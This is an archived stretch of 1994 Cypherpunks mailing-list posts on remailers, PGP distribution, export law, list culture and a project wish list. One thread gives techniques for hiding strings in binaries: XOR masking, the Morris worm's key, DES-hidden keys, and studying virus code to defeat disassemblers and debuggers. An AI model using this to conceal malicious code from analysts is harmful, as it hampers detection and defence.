course, they encrypt as much traffic as possible. Although remailers prevent reverse traffic analysis - tracking mail from the recipient to the sender - they don't protect against traffic analysis from source - tracking the output of a specific site or individual. Dining Cryptographer networks, or DC-Nets were developed almost a decade ago as a networking protocol allowing a group of people to broadcast messages, while making it impossible to identify the specific source from within the group. Unfortunately DC-Nets have not yet gone beyond the early experiments; but there is hope that they will soon silence the electronic envelopes of traffic analysis. Privacy and freedom of expression are basic human rights. Where laws and international treaties have failed to protect them, it looks increasingly likely that in a borderless world of digital signals, technology will. Rishab Aiyer Ghosh is a freelance technology consultant and writer. You can reach him through voice mail (+91 11 3760335) or e-mail (rishab at dxm.ernet.in). --====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====-- This article may be redistributed in electronic form only, PROVIDED THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form, or redistributed in any form for compensation of any kind, WITHOUT PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab at dxm.ernet.in) --==================================================================-- From rishab at dxm.ernet.in Mon Dec 19 13:23:20 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 19 Dec 94 13:23:20 PST Subject: The Economist follows my Electric Dreams! Message-ID: The December 12th episode of my column, Electric Dreams #40, discussed the relative success in text processing using statistical methods over conventional natural language processing. The latest issue of The Economist (Dec 17-24th) has this as its lead science story. I congratulate myself on having one over my favourite periodical! Of course my article was 500 words, so the larger Economist story was more detailed. While I mentioned technology developed by the US National Security Agency and Architext, The Economist referred to research undertaken at BT (formerly British Telecom) and Cornell University, especially the work on automated text-summarization programs. If you'd like a copy of my original article, please send a blank message to rishab at arbornet.org with "get dreams-40" (without the quotes) as the Subject: field. For an index, send "get index"; to automatically receive future episodes of this 5kbyte/week column, send "subscribe". Happy Christmas and New Year! Rishab ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From rishab at dxm.ernet.in Mon Dec 19 13:29:58 1994 From: rishab at dxm.ernet.in (rishab at dxm.ernet.in) Date: Mon, 19 Dec 94 13:29:58 PST Subject: NSA's text search algorithm Message-ID: "Ian Farquhar" : > I always imagined that the development of [NSA's text scanning] > algorithm itself predated email, and started back with cable and > telex traffic. Stat text scanning is ancient, but has probably not been used on the scale and efficiency that the NSA would require for net traffic. > > Earlier this year, the agency began soliciting collaborations from > > business to develop commercial applications of their technique. > > Has anyone got any further information about how this algorithm works? > It sounds like Rishab has somewhat better info than was publicly > available months ago when we last discussed this particular NSA > "technology transfer". Actually my 'info' about NSA's thing was mainly deduction put together with some (limited) specs on Architext (http://www.atext.com graham at atext.com). If you read NSA's note carefully, you easily rule out NLP ("independent of...language") and sophisticated neural nets ("very fast"). The Economist story I mentioned in my last post (on the fact that I beat them to the story!) goes into some detail on BT and Cornell's programs that summarize textual matter. These are apparently successful (included is an pretty good example of a computer-generated summary of the article), but also quite different from NSA's. BT uses basic NLP to get past articles, conjunctions etc (making it language-dependent), and stems (removes -ing, -ed, -s etc, unlike NSA which denies stemming, dictionaries etc; obviously language-dependent), before creating statistical table of word frequencies which are used to determine the subject of a sentence or the similarities between texts. Cornell can search "gigabytes of data ... in a few seconds [for] a subject" or similarity to an example text. It can figure out which sentences are 'important' (by comparing frequency tables). I suspect NSA's is much more pattern-oriented, as its USP is document clustering; maybe it uses some NN at some level. Of course you don't really need to know grammar to filter out articles and pronouns; you could do that statistically too. Rishab ----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA From warrior at infinet.com Mon Dec 19 13:41:46 1994 From: warrior at infinet.com (David M. Harvey) Date: Mon, 19 Dec 94 13:41:46 PST Subject: Pgp in Europe In-Reply-To: <1DB8505345B@bebop.tt.luth.se> Message-ID: Karl, Try ftp://ftp.uu.net/pub/security/virus/crypt/pgp ftp://ftp.win.tue.nl/pub/security/virus/crypt/pgg or ftp://ftp.informatik.uni-hamburg.de/pub/virus/crypt/pgp The last is the best but only allows five users, but the first two are mirrors of the last and are fast. It is the most complete that I have seen, go for it. Dave On Mon, 19 Dec 1994, Karl Lundkvist wrote: > Does anyone know a way to get Pgp 2.6.2 by ftp, mail or something in > Europe? > Karl Lundkvist ___ /\ PGP the Cutting Edge of Privacy. /vvvvvvvvvvvv \-----------------------------------\ | WARRIOR ( | PGP Key Id 0XC554E447D > Magnus Frater Videt Tu `^^^^^^^^^^^^ /===================================/ \/ Finger for PGP 2.6.2 public Key. PGP Fingerprint 15 99 09 6D 11 C8 7C E0 08 C7 E6 95 46 65 FE F0 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= | Dave M. Harvey warrior at infinet.com| | PO Box 151311 dharvey at freenet.columbus.oh.us| | Columbus, OH 43215-8311 fm063 at cleveland.freenet.edu| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= From sandfort at crl.com Mon Dec 19 14:03:16 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 19 Dec 94 14:03:16 PST Subject: Name that phone In-Reply-To: Message-ID: Hi Phil, (1) The PGP Un-clipper (PGP Clipper...Not) (2) Freeh-Free PGP S a n d y From mkj at october.ducktown.org Mon Dec 19 14:26:28 1994 From: mkj at october.ducktown.org (mkj at october.ducktown.org) Date: Mon, 19 Dec 94 14:26:28 PST Subject: freedom+diversity=noise Message-ID: <199412192215.RAA04833@october.ducktown.org> -----BEGIN PGP SIGNED MESSAGE----- This list appears to be going through some sort of crisis. Tim May has quit, others are threatening to quit, and the messages criticizing the list itself threaten to outnumber those on all other topics! Frankly, I don't get it. What's everybody so upset about? A few arguments, some bad manners? Can we afford to be so sensitive? Now, I admit I don't read every message posted here (who has the time?), but I read a fair sampling, and I haven't seen anything half as bad as what I face every day on the subway. At least on this list, nobody has ever pulled a weapon on me! Personally I don't understand why some people are so bothered by the noise here and elsewhere on the nets. Sticks and stones and all that, you know? But a number of people here have even suggested that the Cypherpunks list, at least in its present form, is near the end of its useful life. I would like to go on record as strongly DISagreeing with that suggestion. Sure, I wish we were making more progress faster, but I think we are doing better than many of us realize. The job is not an easy one, and in my experience, I have found that difficult jobs demand perseverance above all other virtues. However, it seems that every time a forum, list, newsgroup or whatever becomes too popular, it reaches a "critical mass" at which people start complaining that everything is ruined, and soon thereafter the forum splinters and/or switches to a moderated format. Thinking about the phenomenon, I came up with the following brilliant (ahem) generalization, which I humbly dub "mkj's law": FREEDOM + DIVERSITY = NOISE Where "noise" is defined as any behavior(s) which a significant portion of the group finds undesirable. The above law appears to apply not only to network forums, but equally well to other types of social groups. (Note for example that mkj's law is inextricably linked with the old amateur-radio principle, "One Man's Signal is Another Man's Noise".) Mkj's law has disturbing implications, in that "noise" (which is normally considered a Bad Thing) is shown to be an inevitable consequence of the combination of freedom and diversity (which are normally considered Good Things). Mkj's law also states that there are only two ways to reduce the noise in any group: (1) Crack down on freedom (impose controls on behavior, the job of police in the physical realm or moderators/censors in the informational realm); or (2) Crack down on diversity (usually by restricting group membership, or perhaps by other means such as strong charismatic leadership). Note that this "mkj's law" stuff is a first-draft, brand-new idea for me; I'm not taking a firm position, just soliciting comments. ObCrypto-Philosophy: Clearly, at the root of the Cypherpunks agenda -- or any pro-privacy agenda -- lies a presumption that freedom and diversity are Good Things, whereas "noise reducers" like censorship, prejudice, and intrusive law-enforcement are Bad Things. I share this presumption. But it might be an interesting exercise to ask: If we can't accept with good grace the current noise on the Cypherpunks list, how are we going to like real life in a global society where freedom and diversity have been greatly increased by "crypto-anarchy"? Will the "global village" fragment into isolationist cliques? Even sooner, will the Cypherpunks? --- mkj P.S. Since I don't recall posting my public key to this list before: - -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAi3q+mcAAAEEAOKHMopu6yj57rtwamGwh79bpxAzcbysIJ17PNc/D902WEHG m81FyrcjZaWgj2jX+JYPKqPrOmy72arHJjP5wkAFd2VG5p+WdQjkwXtObOoJ5qfd l+twaRqZVvl4gDiBoFrdrwVSGxXGqAMLOP3VvcQk3uH4y6GmdF11Wd4tm8clAAUR tC5NYWhhdG1hIEthbmUtSmVldmVzIDxta2pAb2N0b2Jlci5kdWNrdG93bi5vcmc+ =Eb3a - -----END PGP PUBLIC KEY BLOCK----- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvYFdl11Wd4tm8clAQH20AP9ESKpTtl3C926QDOzUZXISQLWDWY6hsxd 1i3g29cePDDfb29D4LweXp5GTJTpGwHE5saXpPuveFrsWUN8KUOBlJRG0g+Sj1JP ZR3QAb/hRlEJBoi7bgpZJQOijXdJIV2oevO5Q9CinRP56CEudCnAhi3xqX5dfMeL ikAwokXsB44= =Nl3X -----END PGP SIGNATURE----- From RGRIFFITH at sfasu.edu Mon Dec 19 14:28:45 1994 From: RGRIFFITH at sfasu.edu (RGRIFFITH at sfasu.edu) Date: Mon, 19 Dec 94 14:28:45 PST Subject: rehash of fbi v. weaver, or 'freeh is a jerk' Message-ID: <01HKTPF3HWNQ0043P5@TITAN.SFASU.EDU> It was announced (I think last week) that there would be no prosecution of the sniper who shot Vicki Weaver as she stood in the cabin door holding her baby. It's good to see an editorial like that in a major newspaper. >i happen to be on the road in tennessee, and read this editorial in the >knoxville new-sentinel. i don't remember seeing anything about this when it >happened...but since freeh and the fbi seem to be disliked these days, >here's some more fodder for the fire. > >-avi > >ps - hopefully this isn't a repeat, but being on the road, i'm mail-delayed >at least 24 hours. > >The Knoxville News-Sentinel, Dec 16, 1994, pA16 > >DISTURBING SILENCE >-FBI chief taking his time acting on report about Idaho shootout > >All eyes are on Louis Freeh, director of the Federal Bureau of >Investigation, as he ponders disciplinary action in the infamous shootout at >Ruby Ridge, Idaho, in 1992. This being the end of 1994, one starts to wonder >what is taking the director so long. > >Excessive use of force by the FBI is no trivial matter. Citizens might >gather from the Idaho case that the government claims special license to >abuse the rights of loners with extremist views. > From ianf at sydney.sgi.com Mon Dec 19 14:30:47 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Mon, 19 Dec 94 14:30:47 PST Subject: Pgp in Europe In-Reply-To: <199412192056.PAA25273@bb.hks.net> Message-ID: <9412200917.ZM12354@wiley.sydney.sgi.com> On Dec 19, 3:56pm, L. McCarthy wrote: > The U.S. govt. doesn't want you to get PGP from the U.S., but you are > (presumably) not a U.S. resident or citizen, so U.S. laws don't apply to you. > As long as _Swedish_ law doesn't bar you from importing strong cryptography > into Sweden, you can grab PGP from wherever you like. As has been discussed many times before, it is not that clear cut. Legal opinion I have gotten said that the US government would almost certainly consider its laws violated if a "foreign national" fetched a piece of ITAR controlled software from a US site, although it's ability to prosecute would be limited _until_that_individual_entered_US_territory_. That's a big gotcha, folks. Let's not forget Phil Z's recent experience with US customs. The legal opinion I have gotten also suggested that traffic passing through the US (but not having a source or destination with that legal juristiction) is a very grey legal area, and even might depend on whether the signal travelled via satellite or cable (there might even be loopholes if it went over US territory - via a satelite link - rather than travelling through it via landlines.) Non-deterministic routing also would make it difficult to prosecute, although the fact that they are investigating Phil for writing the software makes me wonder just how much reality is involved in their decision to proceed with legal action. I personally would be extremely cautious about fetching anything from another country unless that country specifically allowed export of crypto software. Fortunately, most European countries do, and there are several good crypto sites there. Ian. #include "I speak only for myself." From habs at panix.com Mon Dec 19 14:31:15 1994 From: habs at panix.com (Harry S. Hawk) Date: Mon, 19 Dec 94 14:31:15 PST Subject: test1 Message-ID: <199412192230.AA14796@panix.com> Test.. Please ignore.. /hawk -- Harry S. Hawk habs at panix.com Product Marketing Manager PowerMail, Inc. Producers of MailWeir(tm) & PowerServ(tm) From habs at cmyk.warwick.com Mon Dec 19 14:31:27 1994 From: habs at cmyk.warwick.com (Harry S. Hawk) Date: Mon, 19 Dec 94 14:31:27 PST Subject: test2 Message-ID: <9412200130.AA08135@cmyk.warwick.com> Test. Please ignore From andrew_loewenstern at il.us.swissbank.com Mon Dec 19 14:42:13 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Mon, 19 Dec 94 14:42:13 PST Subject: c'punks top 5 Message-ID: <9412192242.AA02002@ch1d157nwk> What, IMHO, are the top 5 most important things the cypherpunks should be concentrating on? No doubt everyone else has their own ideas of what the "cypherpunks top 5" (or top 10) is, so please tell us your suggestions. 1. anonymous http proxy servers ("re-webbers") 2. PGP compatible crypto library 3. reply-able remailers that are secure and easier for the recipient 4. better remailer security (dc-nets) 5. socket-based keyserver interface for real-time automagic key fetches andrew From perry at imsi.com Mon Dec 19 14:48:23 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 19 Dec 94 14:48:23 PST Subject: freedom+diversity=noise In-Reply-To: <199412192215.RAA04833@october.ducktown.org> Message-ID: <9412192247.AA09153@snark.imsi.com> mkj at october.ducktown.org says: > This list appears to be going through some sort of crisis. Is it? I don't see one... .pm From jamesd at netcom.com Mon Dec 19 14:50:10 1994 From: jamesd at netcom.com (James A. Donald) Date: Mon, 19 Dec 94 14:50:10 PST Subject: (fwd) Newt says Clipper Chip is Dead Message-ID: <199412192244.OAA04567@netcom8.netcom.com> Xref: netcom.com alt.culture.usenet:6563 alt.rave:37968 Newsgroups: alt.culture.usenet,alt.rave Path: netcom.com!ix.netcom.com!howland.reston.ans.net!usc!bloom-beacon.mit.edu!crl.dec.com!crl.dec.com!pa.dec.com!mtshasta.snowcrest.net!ken From: ken at snowcrest.net ("Ken Stuart") Message-ID: <82739.ken at mtshasta.snowcrest.net> Reply-To: ken at snowcrest.net Subject: Newt says Clipper Chip is Dead Date: Tue, 13 Dec 94 20:09:25 PDT X-Received: by usenet.pa.dec.com; id AA29312; Tue, 13 Dec 94 20:15:43 -0800 X-Received: by pobox1.pa.dec.com; id AA20213; Tue, 13 Dec 94 20:15:37 -0800 X-Received: from mtshasta.snowcrest.net by inet-gw-1.pa.dec.com (5.65/10Aug94) id AA16575; Tue, 13 Dec 94 20:14:24 -0800 X-Received: from [204.94.225.49] (sl1.mtshasta.snowcrest.net [204.94.225.49]) by mtshasta.snowcrest.net (8.6.5/8.6.5) with SMTP id UAA15046; Tue, 13 Dec 1994 20:13:23 -0800 X-Minuet-Version: Minuet1.0_Beta_16 X-Popmail-Charset: English X-To: alt.rave.usenet at decwrl.dec.com, alt.culture.usenet.usenet at decwrl.dec.com Lines: 16 Hello, On his weekly call-in TV show on National Empowerment Television tonight, Newt received a call asking about his opinion on the Clipper Chip, and he replied that it was a moot point, in that the Clipper chip concept was designed for a condition that no longer exists. So, paranoiacs, lighten up! :-) - respect to all, Ken ken at snowcrest.net (primary address) (if no answer, try ken.stuart at tigerteam.org ) -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From erich at CSUA.Berkeley.EDU Mon Dec 19 15:11:36 1994 From: erich at CSUA.Berkeley.EDU (Erich von Hollander) Date: Mon, 19 Dec 94 15:11:36 PST Subject: the idiot spamming people who post to alt.2600 through my remailer Message-ID: <199412192309.PAA06147@soda.CSUA.Berkeley.EDU> :: Post-To: alt.2600 has been squished. e From ianf at sydney.sgi.com Mon Dec 19 15:12:57 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Mon, 19 Dec 94 15:12:57 PST Subject: NSA's text search algorithm In-Reply-To: Message-ID: <9412200958.ZM12538@wiley.sydney.sgi.com> On Dec 20, 2:33am, rishab at dxm.ernet.in wrote: > Subject: NSA's text search algorithm > "Ian Farquhar" : > > I always imagined that the development of [NSA's text scanning] > > algorithm itself predated email, and started back with cable and > > telex traffic. > > Stat text scanning is ancient, but has probably not been used on the scale > and efficiency that the NSA would require for net traffic. > > > > Earlier this year, the agency began soliciting collaborations from > > > business to develop commercial applications of their technique. > > > > Has anyone got any further information about how this algorithm works? > > It sounds like Rishab has somewhat better info than was publicly > If you read NSA's note carefully, you easily rule out > NLP ("independent of...language") and sophisticated neural nets ("very fast"). You can rule out both of them on the grounds that the original release claimed that it was ammendable to hardware implementation. I speculated some clever form of CAM plus stats engine. Ian. From adam at bwh.harvard.edu Mon Dec 19 15:30:54 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 19 Dec 94 15:30:54 PST Subject: Doomsaying, development, and deployment In-Reply-To: Message-ID: <199412192026.PAA00306@spl> Why use the PGP libs? Would it be easier to use swIPe as an engine for encryption? If you do use swIPe, name the package link IP encryption. Adam Steve wrote: | > | How about starting a todo list so we can reach a consensus on a | > | prioritized list of goals. This may help us come up with projects | > | we can work together on. I'm itching to do some coding... | > | > Some projects worth doing: | > | > a link encryptor | | If someone would recommend the best version of the pgp libs, | I'll think about adding it to plug-gw (from TIS). That would | provide a ready made transparent shell for connecting | systems. -- "It is seldom that liberty of any kind is lost all at once." -Hume From wcs at anchor.ho.att.com Mon Dec 19 15:33:26 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 19 Dec 94 15:33:26 PST Subject: McCoy is Right! New Mail Format to Start Now. Message-ID: <9412192248.AA18275@anchor.ho.att.com> Oh, get real, Lucky! My mail reader here is neither inadequate nor (particularly) buggy - it's good old "Mail", and when somebody posts MIME mail, it quite accurately shows me the real ASCII the mail is made of - I wish my other mail reader would do that. (It's Microsoft Mail, a closed, buggy, really appalling system that chokes on messages with more than 64K of non-attachment message body, and chokes badly on >132K.) If there were a convenient MIME viewer to pop in as my PAGER, I might have mail use it rather than less -sc, my current preference. But meanwhile, a MIME is a terrible thing to waste..... From adam at bwh.harvard.edu Mon Dec 19 15:37:35 1994 From: adam at bwh.harvard.edu (Adam Shostack) Date: Mon, 19 Dec 94 15:37:35 PST Subject: c'punks top 5 In-Reply-To: <9412192242.AA02002@ch1d157nwk> Message-ID: <199412192332.SAA00946@spl.bwh.harvard.edu> Andrew wrote: | 1. anonymous http proxy servers ("re-webbers") | 2. PGP compatible crypto library Whats wrong with PGPtools? (A lack of documentation. Been a while since I looked, but I think it lacked a high level interface. The low level stuff is great, but on the mac, I can send an Appleevent "Encrypt *file recipient" and, some extended period later, get a response. | 3. reply-able remailers that are secure and easier for the recipient | 4. better remailer security (dc-nets) | 5. socket-based keyserver interface for real-time automagic key | fetches Who needs real time? The servers are often bogged down and don't respond in real time anyway. The following procmail works fine. Theres also a short shell script at the end. # prevent bounces, add keys to ring. :0 * From bal at swissnet.ai.mit.edu { :0 * >10000 /dev/null :0 *Subject:.*no keys match /dev/null :0E | pgp +batchmode -fka } # auto key retreival # I have an elm alias, pgp, points to a keyserver # The logfile gets unset briefly to keep the elm lines out of my # logfile. :0BW * -----BEGIN PGP *!^FROM_DAEMON KEYID=|/usr3/adam/bin/sender_unknown LOGFILE= :0ac |elm -s"mget $KEYID" pgp LOGFILE=$MAILDIR/.procmail.log /usr3/adam/bin/sender_unknown: #!/bin/sh # unknown returns a keyid, exits 1 if the key is known # $output is to get the exit status. Othierwise, this would be a one liner. OUTPUT=`pgp -f +VERBOSE=0 +batchmode -o /dev/null` echo $OUTPUT | egrep -s 'not found in file' EV=$? if [ $EV -eq 0 ]; then echo $OUTPUT | awk '{print $6}' fi exit $EV -- "It is seldom that liberty of any kind is lost all at once." -Hume From wcs at anchor.ho.att.com Mon Dec 19 15:42:05 1994 From: wcs at anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204) Date: Mon, 19 Dec 94 15:42:05 PST Subject: properties of FV Message-ID: <9412192315.AA18562@anchor.ho.att.com> In the www-buyinfo discussion on crypto, > From research!nsb.fv.com!nsb Sat Dec 17 09:36:40 1994 >Eric > "If and When" is Yes and Today. Anybody who can autosign their > > The risk analysis is absolutely true. However, I have the impression > you missed the phrase "deployed widely enough to have penetrated a > meaningful portion of our market". I suspect that the cypherbunks and > www-buyinfo communities are not the best place to get a feel for the > extent to which crypto is widely deployed. Pick some random other list > or newsgroup, however, and I'll be surprised if you find 1% market > penetration for crypto. Obviously, from reading Cypherpunks you'd get the idea that everybody has PGP and all but a few old fogies have MIME :-) However, one of the reasons that few people actually are using PGP signatures on all their messages is that there's no real need - most of us realistically aren't trying to overthrow our governments, except through obsolescence and ridicule, and there isn't much problem with forging postings on the net. On the other hand, if my credit card were involved, I'd certainly be happy to start signing all my fv payment confirmations, especially if there were a convenient tool for doing so that got distributed free.... bILL From norm at netcom.com Mon Dec 19 16:11:11 1994 From: norm at netcom.com (Norman Hardy) Date: Mon, 19 Dec 94 16:11:11 PST Subject: IPSP Message-ID: At 11:51 AM 12/19/94, Perry E. Metzger wrote: .... >I'll send sections of my draft if anyone wants to hear more on the >topic. .... I would very much like to see the IPSP stuff. I have searched several MB of new and old mail and found no references to a source. Thanks From andrew_loewenstern at il.us.swissbank.com Mon Dec 19 16:24:01 1994 From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern) Date: Mon, 19 Dec 94 16:24:01 PST Subject: c'punks top 5 Message-ID: <9412200024.AA02051@ch1d157nwk> Adam Shostack writes: > Whats wrong with PGPtools? (A lack of documentation. Been > a while since I looked, but I think it lacked a high level > interface. The low level stuff is great, but on the mac, I can > send an Appleevent "Encrypt *file recipient" and, some extended > period later, get a response. It has been a while since I looked too, does it work with the 'new' format messages generated by MIT pgp? Does anyone actually USE pgptools for any available applications? As far as I know, nobody uses it. If nobody uses PGPtools, then what is the reason? Either nobody really wants a PGP library (which isn't true judging from the inquiries on cypherpunks), or something is wrong with PGPTools. Is it the documentation like you said? Maybe some of us should pick up where pr0duct cypher left off and enhance PGPTools. This brings me to another point: Isn't the file format for PGP supposed to change (I think I remember Colin telling me this quite a long time ago)? If it is, should we bother with PGPtools? What really is the status of PGP 3.0? Assuming the file-format has changed, shouldn't it have been decided by now? If PGP 3.0 is being written on top of a portable generic crypto-library, don't you think this, the foundation of the new PGP, would be ready (after a year+ of working on it and rumors from developers of PGP 3.0 being out in 6 months?). There was a quick thread on this last week and not a peep was heard... I really wish somebody who had a clue would fill us in on where PGP 3.0 really stands. I have the suspicion that it is not nearly as far as we would like to think. If this is the case we should probably get cracking on PGPtools. > | 5. socket-based keyserver interface for real-time automagic key > | fetches > > Who needs real time? The servers are often bogged down > and don't respond in real time anyway. The following > procmail works fine. Theres also a short shell script at the end. When I am checking a signature, I want to be able to check that signature right now! By the time an e-mail request gets back, I'm a 100 articles down the line and not interested in checking that signature anymore. For personal mail, or REALLY important news articles, I am willing to wait, of course. The finger-for-keys server at Illuminati Online is an example of real-time key fetching (although last I tried it didn't work... either it's no longer there, or it has moved from wasabi.io.com and I don't know the generic hostname for their pgp-keyserver), but to access it programatically would require some parsing and such... A keyserver that watched a TCP port and had a very simple protocol (maybe Simple Key Transfer Protocol - SKTP) for requesting keys, would be keen. Maybe auto-key fetching isn't something we need to concentrate on... I was just throwing out some ideas... andrew From jonathon.fletcher at psych.stir.ac.uk Mon Dec 19 16:28:54 1994 From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher) Date: Mon, 19 Dec 94 16:28:54 PST Subject: Hiding strings in objects code Message-ID: <9412200027.AA18993@oss.stir.ac.uk> I'm looking for a way of concealing the text strings in an object file so that they can't be seen. I'd like to use something a little more complicated than rot13 :-), but something that's freely usable for non-profit use. Any suggestions as to which I should use ? -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk From jonathon.fletcher at psych.stir.ac.uk Mon Dec 19 16:45:32 1994 From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher) Date: Mon, 19 Dec 94 16:45:32 PST Subject: c'punks top 5 Message-ID: <9412200043.AA19009@oss.stir.ac.uk> > > 1. anonymous http proxy servers ("re-webbers") > What is wanted/meant for these ? -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk From jonathon.fletcher at psych.stir.ac.uk Mon Dec 19 16:48:55 1994 From: jonathon.fletcher at psych.stir.ac.uk (Jonathon Fletcher) Date: Mon, 19 Dec 94 16:48:55 PST Subject: Physical location of a machine Message-ID: <9412200047.AA19020@oss.stir.ac.uk> >From David Harvey's list of places holding pgp outside the us: ftp://ftp.uu.net/pub/security/virus/crypt/pgp where, physically, is this machine (country). -Jon -- Jonathon Fletcher, j.fletcher at stirling.ac.uk From warlord at MIT.EDU Mon Dec 19 16:55:37 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 19 Dec 94 16:55:37 PST Subject: Hiding strings in objects code In-Reply-To: <9412200027.AA18993@oss.stir.ac.uk> Message-ID: <9412200055.AA06815@steve-dallas.MIT.EDU> > I'm looking for a way of concealing the text strings in an object file > so that they can't be seen. I'd like to use something a little more > complicated than rot13 :-), but something that's freely usable for > non-profit use. I assume you mean so that running "strings" on the binary will not lead you to anything, right? You can use an XOR with some weird value to hide the strings. Just make sure the value you use will, for example, set the high bit on the string bytes... Its is a cheap, free way to hide strings. It is, by no means, secure. -derek From rogaski at phobos.lib.iup.edu Mon Dec 19 16:55:50 1994 From: rogaski at phobos.lib.iup.edu (Mark Rogaski) Date: Mon, 19 Dec 94 16:55:50 PST Subject: Name that phone Message-ID: <199412200055.TAA18044@phobos.lib.iup.edu> -----BEGIN PGP SIGNED MESSAGE----- Why not a little recursion? PGP --> Phones Get PGP :) - ----- Mark Rogaski a.k.a. Doc "I used to think that my brain was the rogaski at phobos.lib.iup.edu best part of my body ... but then I http://www.lib.iup.edu/~rogaski/ remembered who was telling me this." 100,000 lemmings can't be wrong! - Emo Phillips >>>>>finger fllevta at oak.grove.iup.edu for PGP Public Key and Geek Code v2.1<<<<< Disclaimer: You would probably be hard-pressed to find ANYONE who agrees with me, much less my university or employer... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLvYrYx0c4/pqJauBAQFzQQP7BlBpOAFpAwVUPo605Z4nxw+qRpNGWKwm 4JgcUpv559z50X3sPy01XQidTV+Cye8+63iVD1vgKyFZllRC6kUkF3r6RiDD7I1P u0Vi4VOb32OBozlXX+DORfn9m9aUP106RPmpe8PtWmO5B6FogxqYH/SBjzaxbuMq IfMq37DW5Jc= =tdgH -----END PGP SIGNATURE----- From jef at ee.lbl.gov Mon Dec 19 17:33:22 1994 From: jef at ee.lbl.gov (Jef Poskanzer) Date: Mon, 19 Dec 94 17:33:22 PST Subject: Hiding strings in objects code Message-ID: <199412200132.RAA12865@hot.ee.lbl.gov> >I assume you mean so that running "strings" on the binary will not >lead you to anything, right? You can use an XOR with some weird value >to hide the strings. Just make sure the value you use will, for >example, set the high bit on the string bytes... > >Its is a cheap, free way to hide strings. It is, by no means, secure. When rtm used this technique in his worm I'm sure a lot of people, such as myself, spent the five minutes necessary to hack up a program that tries XORing the input with all 256 possible bytes. I had the program pipe the output of each try through strings and wc, to check whether any significant text was uncovered. Only 0x00 and the single now-forgotten value he used got hits - no second XOR value. Anyway the point is it's *really* by no means secure, and you can do much better with a few minutes thought. Set up a basic framework using a Makefile that takes a file of MNEMONIC "text string" and runs it through an encoding program to produce a .h file of static char* text[] = { ... #define MNEMONIC 17 "vb4hv7789sd", Then in your actual program you just call decode(text[MNEMONIC]); Given that simple framework you can experiment with lots of different encoding and decoding functions. --- Jef From alex at omaha.com Mon Dec 19 17:39:01 1994 From: alex at omaha.com (Alex Strasheim) Date: Mon, 19 Dec 94 17:39:01 PST Subject: hiding strings in binaries Message-ID: <199412200139.TAA02213@omaha.omaha.com> -----BEGIN PGP SIGNED MESSAGE----- I didn't write this program and I don't know how it works. It was posted on the nyx freenet by kstern at nyx.cs.du.edu. When you compile and run it, it prints out the lyrics to "The Twelve Days of Christmas". As you might imagine from looking at the code, strings doesn't find anything in it. #include main(t,_,a) char *a; { return!0 Message-ID: <199412200211.SAA28060@mycroft.rand.org> > Jef Poskanzer writes: > When rtm used this technique in his worm I'm sure a lot of people, > such as myself, spent the five minutes necessary to hack up a program > that tries XORing the input with all 256 possible bytes. I had the > program pipe the output of each try through strings and wc, to check > whether any significant text was uncovered. Only 0x00 and the single > now-forgotten value he used got hits - no second XOR value. Yes, I did too -- it was 0x81. I think my message of worm passwords was the first to make it out, along with my Perl script to try out your own password file. Yes, Perl was already around. What method you use in your program depends on your model of your opponent. If it's somebody only mildly interested, flipping the bits is fine. For a slightly higher level of anxiety, you could use Vigenere-like stuff -- XORing with a short key (8 bytes at a time with long longs if you're in gcc, for example), or use a longer key and restart now and then (interrupted key). For the next higher level, you might use DES and hide the key in your data, making them disassemble it. Next step... make your code obscure. After that... hardware. You might want to study some virus code to see how they try to thwart disassemblers and debuggers. YMMV. Jim Gillogly Mersday, 30 Foreyule S.R. 1994, 02:06 From jrochkin at cs.oberlin.edu Mon Dec 19 18:26:28 1994 From: jrochkin at cs.oberlin.edu (Jonathan Rochkind) Date: Mon, 19 Dec 94 18:26:28 PST Subject: (fwd) Newt says Clipper Chip is Dead Message-ID: At 5:44 PM 12/19/94, James A. Donald wrote: >On his weekly call-in TV show on National Empowerment Television tonight, >Newt received a call asking about his opinion on the Clipper Chip, and he >replied that it was a moot point, in that the Clipper chip concept was >designed for a condition that no longer exists. Eh? What condition is that? I don't understand. What condition used to exist that required the deployment of the Clipper Chip, that no longer exists? What was he talking about? From elton at sybase.com Mon Dec 19 18:30:42 1994 From: elton at sybase.com (Elton Wildermuth) Date: Mon, 19 Dec 94 18:30:42 PST Subject: hiding strings in 